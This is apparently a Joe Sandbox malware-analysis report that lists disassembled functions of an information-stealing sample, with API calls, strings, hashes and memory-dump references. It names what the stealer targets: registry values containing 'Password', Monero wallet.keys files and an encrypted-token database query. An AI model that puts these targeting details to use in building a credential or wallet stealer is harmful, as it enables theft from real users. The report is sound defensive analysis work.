                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: ae09cb4dd437b36bb59bbb544841fcd725205c2b863e7d2ba82ddee6ed985482
                        • Instruction ID: f99800b8c83349efa969fe6d5d41bc499ed66600bd06ebd88937223162e69010
                        • Opcode Fuzzy Hash: ae09cb4dd437b36bb59bbb544841fcd725205c2b863e7d2ba82ddee6ed985482
                        • Instruction Fuzzy Hash: 122138B1E45348ABDB00DFD9CC49FAEB7B9FB44B10F104219F605BB280D77869018BA9
                        Function 006D72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006D73B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006D740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 006D7452
                        • HeapFree.KERNEL32(00000000), ref: 006D7459
                        • task.LIBCPMTD ref: 006D7555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: fefcbba48f9abdcd2a46e1d3c042c3336a03969cf077ddc19c5d9a662940f621
                        • Instruction ID: ea0e6c826d52b5bc60c6d1cfd62eea3e0139fa8ce4e1b50f842529d24cd1b0b9
                        • Opcode Fuzzy Hash: fefcbba48f9abdcd2a46e1d3c042c3336a03969cf077ddc19c5d9a662940f621
                        • Instruction Fuzzy Hash: 8F612CB5D1416C9BDB24DB50CC45BD9B7B9BF48300F0081EAE649A6241EB706FC9CFA5
                        Function 006E7690 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,00E3C128,00000000,00020119,00000000), ref: 006E76DD
                        • RegQueryValueExA.ADVAPI32(00000000,00E4E4E8,00000000,00000000,?,000000FF), ref: 006E76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11$
                        • API String ID: 3225020163-442948342
                        • Opcode ID: 6bbe9308d8b150fe0dce18417cb0338c077ad4ad46b62d4c9a11a5a152cf1a53
                        • Instruction ID: bca55ce39565abff2353497772b3e4ad531d0cbda8c8c94ee736cd67071464e4
                        • Opcode Fuzzy Hash: 6bbe9308d8b150fe0dce18417cb0338c077ad4ad46b62d4c9a11a5a152cf1a53
                        • Instruction Fuzzy Hash: CF014FB5B19308BBEB00DBE5DC49FF9B7B9EB48701F108094FA0497291E6749E05DB51
                        Function 006DBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        • lstrlen.KERNEL32(00000000), ref: 006DBC9F
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 006DBCCD
                        • lstrlen.KERNEL32(00000000), ref: 006DBDA5
                        • lstrlen.KERNEL32(00000000), ref: 006DBDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 211137146d0beecaaa93967c90247b9cb7d55e7e9fc7a5ceeb78d94556deee32
                        • Instruction ID: 0dddff7aea84648cb2f60b389d53ccc017e6e9b8d2a746484b21e2d978138c54
                        • Opcode Fuzzy Hash: 211137146d0beecaaa93967c90247b9cb7d55e7e9fc7a5ceeb78d94556deee32
                        • Instruction Fuzzy Hash: EBB162719122489BDB44EBE1DC96EEE733BAF14300F41412DF506A6192EF347E49CB6A
                        Function 006E6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 9c3423c5177b16c9f447f81c9408712e6f29e87e6188638b6c602db122e66c39
                        • Instruction ID: 8581fabe0e4205bfdd44749d89a4d5e7e4ead9b765ff4f3d321cad4ca896c1e1
                        • Opcode Fuzzy Hash: 9c3423c5177b16c9f447f81c9408712e6f29e87e6188638b6c602db122e66c39
                        • Instruction Fuzzy Hash: 5BF03A30E1A249EFE7449FE0E9097AC7B70FB05712F148198F609862D0D6704F41EB96
                        Function 006E4780 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,00E4E038), ref: 006E47DB
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4801
                        • lstrcat.KERNEL32(?,?), ref: 006E4820
                        • lstrcat.KERNEL32(?,?), ref: 006E4834
                        • lstrcat.KERNEL32(?,00E3B860), ref: 006E4847
                        • lstrcat.KERNEL32(?,?), ref: 006E485B
                        • lstrcat.KERNEL32(?,00E4DA40), ref: 006E486F
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006E8D90: GetFileAttributesA.KERNEL32(00000000,?,006D1B54,?,?,006F564C,?,?,006F0E1F), ref: 006E8D9F
                          • Part of subcall function 006E4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006E4580
                          • Part of subcall function 006E4570: RtlAllocateHeap.NTDLL(00000000), ref: 006E4587
                          • Part of subcall function 006E4570: wsprintfA.USER32 ref: 006E45A6
                          • Part of subcall function 006E4570: FindFirstFileA.KERNEL32(?,?), ref: 006E45BD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID: 8
                        • API String ID: 2540262943-3897458245
                        • Opcode ID: 88825a515cc5c4c75ca86adb2dd51f0fe8a5a412b6a39a18f754ef4467b17685
                        • Instruction ID: ccff97d719a0005e69368b067cdef082fe5021ced1fb957ee983e079ba250654
                        • Opcode Fuzzy Hash: 88825a515cc5c4c75ca86adb2dd51f0fe8a5a412b6a39a18f754ef4467b17685
                        • Instruction Fuzzy Hash: BB3153B6D113086BCB50FBB0DC85EE9737DAB58700F40458DB31996082EE74AB89CB99
                        Function 006D4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006D4FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D4FD1
                        • InternetOpenA.WININET(006F0DDF,00000000,00000000,00000000,00000000), ref: 006D4FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 006D5011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 006D5041
                        • InternetCloseHandle.WININET(?), ref: 006D50B9
                        • InternetCloseHandle.WININET(?), ref: 006D50C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: af34b44d1a462bb824314b9db19c2224095984207c46fe91b19d52ee4cba300c
                        • Instruction ID: b81518e7e7e14896ce1fd2566d873634a33abaff72938563482ba9731c7e78de
                        • Opcode Fuzzy Hash: af34b44d1a462bb824314b9db19c2224095984207c46fe91b19d52ee4cba300c
                        • Instruction Fuzzy Hash: 4E3112B4E01218ABDB20CF54CC85BDCB7B5EB48704F1081D9EA09A7281CB746EC5CF99
                        Function 006E83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006E8426
                        • wsprintfA.USER32 ref: 006E8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006E847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E8499
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,00E4E4D0,00000000,000F003F,?,00000400), ref: 006E84EC
                        • lstrlen.KERNEL32(?), ref: 006E8501
                        • RegQueryValueExA.ADVAPI32(00000000,00E4E548,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006F0B34), ref: 006E8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 1d0afb3ef1f6bd607307fe56d5334719ffdf2d04116c977753ebeb4a11f34379
                        • Instruction ID: def8ec3c70cebf8191130a8cac2290e486565f7582127c40fb5ac6c961007ea7
                        • Opcode Fuzzy Hash: 1d0afb3ef1f6bd607307fe56d5334719ffdf2d04116c977753ebeb4a11f34379
                        • Instruction Fuzzy Hash: C02107B1A15218AFDB24DB54DC85FE9B3B9FB48700F00C1D9A609A6280DF71AA85CFD4
                        Function 006E7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E773B
                        • RegOpenKeyExA.ADVAPI32(80000002,00E3C128,00000000,00020119,006E76B9), ref: 006E775B
                        • RegQueryValueExA.ADVAPI32(006E76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006E777A
                        • RegCloseKey.ADVAPI32(006E76B9), ref: 006E7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 3fdc701027117203ba572671f6f41300285dbb73ff3b5bc7c332ef171aa95fa8
                        • Instruction ID: d7bf9d6e4e5c80ee3218f35b3699353e7d5efdcca6e8e0690059e1d10c6447cd
                        • Opcode Fuzzy Hash: 3fdc701027117203ba572671f6f41300285dbb73ff3b5bc7c332ef171aa95fa8
                        • Instruction Fuzzy Hash: 37012CB5A55308BBEB00DBE4DC4AFEEB7B8EB48700F108199FA15A7281DA705A00DB51
                        Function 006E92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(:n,80000000,00000003,00000000,00000003,00000080,00000000,?,006E3AEE,?), ref: 006E92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:n), ref: 006E9319
                        • CloseHandle.KERNEL32(000000FF), ref: 006E9327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :n$:n
                        • API String ID: 1378416451-3885358969
                        • Opcode ID: b2fbc712a94a33c11676a4d45a1d18bd0b12e5829bcc4e9a20240992eb1cf455
                        • Instruction ID: f5c6d1f5ca55491244d49bd546625feffb671680f361a4a8b2d84a993cf40a90
                        • Opcode Fuzzy Hash: b2fbc712a94a33c11676a4d45a1d18bd0b12e5829bcc4e9a20240992eb1cf455
                        • Instruction Fuzzy Hash: 1CF03C35F55308BBDB10DBB1DC49B9EB7BAAB48720F10C254BA51A72C0D6719B01DF50
                        Function 006D99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
